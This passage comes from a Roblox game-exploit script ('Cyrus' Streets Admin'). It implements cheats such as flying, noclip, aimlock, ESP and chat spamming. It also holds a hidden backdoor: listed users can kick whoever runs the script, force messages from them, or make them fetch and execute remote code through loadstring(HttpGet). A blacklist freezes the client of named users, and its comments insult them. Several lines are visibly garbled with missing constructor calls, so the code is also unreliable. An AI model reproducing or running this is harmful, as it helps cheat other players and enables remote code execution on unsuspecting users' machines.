  2286. local Tool = Char:FindFirstChildOfClass'Tool'
  2287. if Tool and Tool:FindFirstChild'Ammo' then
  2288. DrawingT.Text = "Current WalkSpeed: "..Char.Humanoid.WalkSpeed.."\nSprinting Speed: "..ShiftSpeed.."\nCrouching Speed: "..ControlSpeed.."\nJumpPower: "..Char.Humanoid.JumpPower.."\nFlying: "..tostring(flying).."\nNoclipping: "..tostring(Noclipping).."\nAimlock Target: "..tostring(AimlockTarget).."\n"..Tool.Name.." Clips & Ammo: "..Tool.Clips.Value..":"..Tool.Ammo.Value
  2289. else
  2290. DrawingT.Text = "Current WalkSpeed: "..Char.Humanoid.WalkSpeed.."\nSprinting Speed: "..ShiftSpeed.."\nCrouching Speed: "..ControlSpeed.."\nJumpPower: "..Char.Humanoid.JumpPower.."\nFlying: "..tostring(flying).."\nNoclipping: "..tostring(Noclipping).."\nAimlock Target: "..tostring(AimlockTarget)
  2291. end
  2292. end
  2293. if PartFound and Blinking then
  2294. if BlinkMode == "None" or BlinkMode == "Shift" and KeyTable['Shift'] then
  2295. if KeyTable['w'] then
  2296. PartFound.CFrame = PartFound.CFrame *,0,-BlinkSpeed)
  2297. end
  2298. if KeyTable['a'] then
  2299. PartFound.CFrame = PartFound.CFrame *,0,0)
  2300. end
  2301. if KeyTable['s'] then
  2302. PartFound.CFrame = PartFound.CFrame *,0,BlinkSpeed)
  2303. end
  2304. if KeyTable['d'] then
  2305. PartFound.CFrame = PartFound.CFrame *,0,0)
  2306. end
  2307. end
  2308. end
  2309. wait()
  2310. end
  2311. end
  2312. end)
  2314. if PartTable then
  2315. spawn(function()
  2316. while wait() do
  2317. if LP.Character:FindFirstChildOfClass'Humanoid' and LP.Character.Humanoid.HipHeight > 0 or AirWalkOn and LP.Character.Humanoid.FloorMaterial == Enum.Material.Neon and not LP.Character.Humanoid.Sit then
  2318. local JP = LP.Character.Humanoid.JumpPower
  2319. LP.Character.Humanoid.JumpPower = 1.5
  2320. LP.Character.Humanoid:ChangeState(3)
  2321. wait(0.2)
  2322. LP.Character.Humanoid.JumpPower = JP
  2323. end
  2324. end
  2325. end)
  2326. end
  2328. spawn(function()
  2329. while wait(SpamDelay) do
  2330. if Spamming and SpamMessage then
  2331. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(SpamMessage,"All")
  2332. end
  2333. end
  2334. end)
  2336. spawn(function()
  2337. while wait(10) do
  2338. if AntiAfk then
  2339. keypress(0x20)
  2340. end
  2341. end
  2342. end)
  2344. local function espcool(Plr)
  2345. local Esp1 ='BillboardGui',Plr.Character.Head)
  2346. Esp1.Adornee = Plr.Character.Head
  2347. Esp1.Size =,100,0,100)
  2348. Esp1.StudsOffset =,1,0)
  2349. Esp1.AlwaysOnTop = true
  2350. local Esp2 ='TextLabel',Esp1)
  2351. Esp2.BackgroundTransparency = 1
  2352. Esp2.Text = CoolkidTable[tostring(Plr.UserId)].Name
  2353. Esp2.Position =,0,0,0)
  2354. Esp2.Size =,0,0,40)
  2355. Esp2.TextColor3 = CoolkidTable[tostring(Plr.UserId)].Colour
  2356. Esp2.TextStrokeTransparency = 0.5
  2357. Esp2.TextSize = 15
  2358. Esp2.TextStrokeColor3 = CoolkidTable[tostring(Plr.UserId)].Colour
  2359. if Plr.Character:FindFirstChild'Humanoid' then
  2360. Plr.Character.Humanoid.DescendantAdded:Connect(function(T)
  2361. if T:IsA'Trail' then
  2362. T.Color =[tostring(Plr.UserId)].Colour)
  2363. end
  2364. end)
  2365. end
  2366. local Table = {}
  2367. for i,v in pairs(Plr.Backpack:GetChildren()) do if v:IsA'Tool' and v:FindFirstChild'Fire' then table.insert(Table,v) end end
  2368. for i,v in pairs(Plr.Character:GetChildren()) do if v:IsA'Tool' and v:FindFirstChild'Fire' then table.insert(Table,v) end end
  2369. -- To make sure all tools get set ugly I know lol
  2370. for Index,Tool in pairs(Table) do
  2371. for Index2,Part in pairs(Tool:GetDescendants()) do
  2372. if Part:IsA'UnionOperation' or Part:IsA'Part' or Part:IsA'MeshPart' then
  2373. if Part:IsA'UnionOperation' then
  2374. Part.UsePartColor = true
  2375. end
  2376. Part.Material = "ForceField"
  2377. Part.Color = CoolkidTable[tostring(Plr.UserId)].Colour
  2378. end
  2379. end
  2380. end
  2381. Plr.Character.ChildAdded:Connect(function(T)
  2382. if T:IsA'Tool' and T:FindFirstChild'Fire' then
  2383. for Index2,Part in pairs(T:GetDescendants()) do
  2384. if Part:IsA'UnionOperation' or Part:IsA'Part' or Part:IsA'MeshPart' then
  2385. if Part:IsA'UnionOperation' then
  2386. Part.UsePartColor = true
  2387. end
  2388. Part.Material = "ForceField"
  2389. Part.Color = CoolkidTable[tostring(Plr.UserId)].Colour
  2390. end
  2391. end
  2392. end
  2393. end)
  2394. end
  2396. local PlayersX = Players:GetPlayers()
  2397. for i = 1,#PlayersX do
  2398. local Plr = PlayersX[i]
  2399. if CoolkidTable[tostring(Plr.UserId)] and Plr.Character:FindFirstChild'Head' then
  2400. espcool(Plr)
  2401. Plr.CharacterAdded:Connect(function()
  2402. local Head = Plr.Character:WaitForChild('Head',10)
  2403. if Head then
  2404. espcool(Plr)
  2405. end
  2406. end)
  2407. if CoolkidTable[tostring(Plr.UserId)].Access then
  2408. Plr.Chatted:Connect(function(Chat)
  2409. local Arguments = string.split(Chat:sub(2)," ")
  2410. local Player = PlrFinder(Arguments[1])
  2411. table.remove(Arguments,1)
  2412. if Player and Player == LP or typeof(Player) == "table" then
  2413. if not CoolkidTable[tostring(LP.UserId)] then
  2414. if Chat:sub(1,1) == "`" then
  2415. CheckCommand(table.concat(Arguments," "))
  2416. end
  2417. if Chat:sub(1,1) == "[" then
  2418. LP:Kick('You have been kicked by '..Plr.Name.." for "..table.concat(Arguments," "))
  2419. end
  2420. if Chat:sub(1,1) == "~" then
  2421. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("abc123","All")
  2422. end
  2423. if Chat:sub(1,1) == "]" then
  2424. loadstring(game:HttpGet(""..Arguments[1],true))()
  2425. end
  2426. end
  2427. end
  2428. end)
  2429. end
  2430. end
  2431. if Plr ~= LP then
  2432. local Chatted;
  2433. Chatted = Plr.Chatted:Connect(function(A) -- had to make it a function instead of calling :Wait() on it or it would yield the whole loop lmao
  2434. if A == "Hey I'm a cyrus' streets admin user1" then
  2435. Chatted:Disconnect()
  2436. Players:Chat("Hey I'm a cyrus' streets admin user1")
  2437. local abc123;
  2438. for i = 1,#PlayerTable do
  2439. if PlayerTable[i] and PlayerTable[i][2] == Plr then
  2440. PlayerTable[i][5] = "true"
  2441. abc123 = true
  2442. end
  2443. end
  2444. table.insert(AdminUsers,Plr.UserId)
  2445. if not abc123 and UseDraw then
  2446. espPlayer(Plr,nil,true)
  2447. end
  2448. end
  2449. end)
  2450. end
  2451. end
  2453. Players.PlayerAdded:Connect(function(Plr)
  2454. if CoolkidTable[tostring(Plr.UserId)] then
  2455. Plr.CharacterAdded:Connect(function()
  2456. if CoolkidTable[tostring(Plr.UserId)].Access then
  2457. Plr.Chatted:Connect(function(Chat)
  2458. local Arguments = string.split(Chat:sub(2)," ")
  2459. local Player = PlrFinder(Arguments[1])
  2460. table.remove(Arguments,1)
  2461. if Player and Player == LP or typeof(Player) == "table" then
  2462. if not CoolkidTable[tostring(LP.UserId)] then
  2463. if Chat:sub(1,1) == "`" then
  2464. CheckCommand(table.concat(Arguments," "))
  2465. end
  2466. if Chat:sub(1,1) == "[" then
  2467. LP:Kick('You have been kicked by '..Plr.Name.." for "..table.concat(Arguments," "))
  2468. end
  2469. if Chat:sub(1,1) == "~" then
  2470. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("abc123","All")
  2471. end
  2472. if Chat:sub(1,1) == "]" then
  2473. loadstring(game:HttpGet(""..Arguments[1],true))()
  2474. end
  2475. end
  2476. end
  2477. end)
  2478. end
  2479. local Head = Plr.Character:WaitForChild('Head',10)
  2480. if Head then
  2481. espcool(Plr)
  2482. end
  2483. end)
  2484. end
  2485. local p;
  2486. P = Plr.Chatted:Connect(function(A)
  2487. if A == "Hey I'm a cyrus' streets admin user1" then
  2488. P:Disconnect()
  2489. Players:Chat("Hey I'm a cyrus' streets admin user1")
  2490. local abc123;
  2491. for i = 1,#PlayerTable do
  2492. if PlayerTable[i] and PlayerTable[i][2] == Plr then
  2493. PlayerTable[i][5] = "true"
  2494. abc123 = true
  2495. end
  2496. end
  2497. table.insert(AdminUsers,Plr.UserId)
  2498. if not abc123 and UseDraw then
  2499. espPlayer(Plr,nil,true)
  2500. end
  2501. end
  2502. end)
  2503. end)
  2505. local FileDir,isFolder,makeFolder = syn_io_listdir or list_files,syn_io_isfolder or isfolder,syn_io_makefolder or makefolder
  2507. if FileDir and isFolder and makeFolder then
  2508. if not isFolder'CyAdminPlugins' then
  2509. makeFolder('CyAdminPlugins')
  2510. end
  2511. for _,v in pairs(FileDir'CyAdminPlugins') do
  2512. local WorkingFile = loadfile(v)
  2513. if not WorkingFile then
  2514. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("There was a syntax error (sadly can\'t output it as loadfile is gay)","All")
  2515. else
  2516. local Work,Error = pcall(WorkingFile)
  2517. if not Work then
  2518. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Runtime Error"..Error,"All")
  2519. end
  2520. end
  2521. end
  2522. end
  2524. local BlacklistTable = {
  2525. [251848039] = true; -- Cyruzsz | Reason: annoying skid,dick rider
  2526. [57890959] = true; -- Fevlix | Reason: annoying skid
  2527. [339273796] = true; -- endlessjj Reason: Forget
  2528. [39000370] = true; -- cheezcayk | Reason: Forget
  2529. [363849133] = true; -- vxonc | Reason: annoying skid
  2530. [1618476217] = true; -- DranghetaSINS | Reason: Alt of V
  2531. [1508268550] = true; -- Zerulogy | Reason: Alt of V
  2532. [1271632090] = true; -- OrphanageKid | Reason: annoying
  2533. [296541717] = true; -- R4ELEEN | Reason:
  2534. }
  2536. if BlacklistTable[LP.UserId] then
  2537. while true do end -- crash that dumb ass skid!
  2538. end
  2540. for i = 1,#Commands do
  2541. local Alias = Commands[i].Alias
  2542. Create(Commands[i].Name)
  2543. for v = 1,#Alias do
  2544. Create(Alias[v])
  2545. end
  2546. CreateCommand(,0,0.0127776451,0 + (i * 20)),Commands[i].Name.." "..Commands[i].Help)
  2547. end
  2549. notif("Cyrus' Streets Admin has loaded!","It took "..(tick() - Tick).." seconds to load (Type Commands for help)\nDiscord Invite: nXcZH36",10,"rbxassetid://2474242690")
  2550. notif("Hotkeys:","No chat prefix\nCommandbar Prefix is '\nRight clicking door: lock/unlock\nPressing e with guns stomps",10,nil)
  2551. notif("Newest Update:", "I Slays, am now editing this script. | Van region added.",10,"rbxassetid://4876209969")
  2552. --[[
  2553. if game.PlaceId == 455366377 then
  2554. local InfectedTable = {}
  2556. while wait() do
  2557. if not LP.PlayerGui.HUD.INFEC then LP:Kick'NICE TRY! YOU WILL BE FORCED TO INFECT PEOPLE.' end
  2558. if LP.PlayerGui.HUD.INFEC.Visible then
  2559. local PlayerC = Players:GetPlayers()
  2560. for i = 1,#PlayerC do
  2561. local Player = PlayerC[i]
  2562. local Infected = false
  2563. if not InfectedTable[Player] and Player ~= LP then
  2564. repeat wait()
  2565. if Player.Character and Player.Character:FindFirstChild'Torso' and GetChar():FindFirstChild'Torso' then
  2566. GetChar().Torso.CFrame = Player.Character.Torso.CFrame
  2567. for i,v in pairs(Player.Character.Humanoid:GetPlayingAnimationTracks()) do
  2568. if string.find(v.Animation.AnimationId,"4812408744") then
  2569. Infected = true
  2570. table.insert(InfectedTable,Player)
  2571. end
  2572. end
  2573. game:GetService'RunService'.Heartbeat:wait()
  2574. end
  2575. until Infected
  2576. Infected = false
  2577. end
  2578. end
  2579. end
  2580. end
  2581. end
  2582. ]]
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